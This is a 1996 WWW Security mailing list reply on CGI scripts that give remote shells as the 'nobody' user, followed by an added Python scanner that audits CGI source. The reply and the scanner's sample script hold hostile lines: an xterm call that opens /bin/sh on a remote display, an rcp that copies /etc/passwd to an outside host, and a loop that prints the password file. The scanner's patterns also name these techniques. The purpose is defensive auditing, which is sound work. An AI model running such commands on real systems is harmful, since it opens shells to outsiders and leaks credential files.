[3680] in WWW Security List Archive
Re: Hole: nobody shell
daemon@ATHENA.MIT.EDU (Eli Beker)
Wed Dec 4 06:42:19 1996
Date: Wed, 4 Dec 1996 11:41:05 +0200 (IST)
From: Eli Beker <beker@ibm.net.il>
To: www-security@ns2.rutgers.edu, John Stewart <jns@cisco.com>
cc: Andrea Di Fabio <fabio@cs.odu.edu>,
IBM Israel - Internet Unix Support Team <moked@ibm.net.il>
In-Reply-To: <199612032256.OAA19078@ace.cisco.com>
Errors-To: owner-www-security@ns2.rutgers.edu
On Tue, 3 Dec 1996, John Stewart wrote:
> -> What if I have a cgi script which does the following:
> -> system("/usr/local/X11R6/bin/xterm -display myhost:0.0 -e /bin/sh&")
> ->
>
> Other than checking which CGI programs are written onto your server?
> My thoughts:
>
> 1. Block outbound X; clearly not for everybody and really only stops
> one port (which can be worked around)
>
Yes, but what about:
system("/bin/rcp /etc/passwd Any_Host: &");
or:
open (IN,"</etc/passwd");
while (<IN>) {
    print;
}
> 2. Don't have X/Openwindows/HPVue software on your Web server. We've
> done that here for this very reason.
>
> 3. Audit.
>
Auditing, auditing, auditing. That's the key to the solution.
Regards,
--Eli
+--------------------------------------------------------------------+
| Eli Beker WWW: http://www.ibm.net.il/~beker |
| Unix System Admin. |
| Internet Technology Programs |
| Phone: +972-3-6978687 |
| Fax : +972-3-6978115 |
| E-Mail: beker@ibm.net.il Vnet: LBE at TELVM1 |
+--------------------------------------------------------------------+
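An audit aid in the spirit of the thread's last point, added here as an example that is not part of the original messages: it scans CGI source files for the kinds of calls discussed above (shell escapes via system(), rcp of files, X clients such as xterm, and reads of /etc/passwd) and reports them by line and category. The pattern list and the sample scripts are constructed for illustration and are not exhaustive.

```python
import os
import re
from pathlib import Path

# Constructed pattern list, modeled on the calls discussed in the thread.
PATTERNS = {
    "shell-escape": re.compile(r"\b(system|exec)\s*\(|`[^`]*`|\bopen\s*\([^)]*\|"),
    "remote-copy": re.compile(r"\brcp\b|\bscp\b|\bftp\b"),
    "x-client": re.compile(r"\bxterm\b|-display\s+\S+"),
    "sensitive-file": re.compile(r"/etc/(passwd|shadow|group)\b"),
}

def audit_source(text):
    """Return [(lineno, category, stripped_line), ...] for one script's source."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):  # skip shebang and comment lines
            continue
        for category, pattern in PATTERNS.items():
            if pattern.search(line):
                findings.append((lineno, category, line.strip()))
    return findings

def audit_tree(root, suffixes=(".cgi", ".pl", ".sh")):
    """Audit every script-like file under a cgi-bin directory; {path: findings}."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and (path.suffix in suffixes or os.access(path, os.X_OK)):
            findings = audit_source(path.read_text(errors="replace"))
            if findings:
                report[str(path)] = findings
    return report

# Constructed sample CGI, modeled on the scripts quoted in the thread.
SAMPLE_CGI = r"""#!/usr/local/bin/perl
# constructed sample for the audit example
print "Content-type: text/plain\n\n";
system("/usr/local/X11R6/bin/xterm -display myhost:0.0 -e /bin/sh&");
system("/bin/rcp /etc/passwd Any_Host: &");
open (IN,"</etc/passwd");
while (<IN>) {
    print;
}
"""

# Constructed benign CGI that should produce no findings.
BENIGN_CGI = r"""#!/usr/local/bin/perl
print "Content-type: text/html\n\n";
print "<h1>Hello</h1>\n";
"""

if __name__ == "__main__":
    for lineno, category, line in audit_source(SAMPLE_CGI):
        print(f"line {lineno}: {category}: {line}")
```

Point audit_tree at a cgi-bin directory to produce the same report for every script found there.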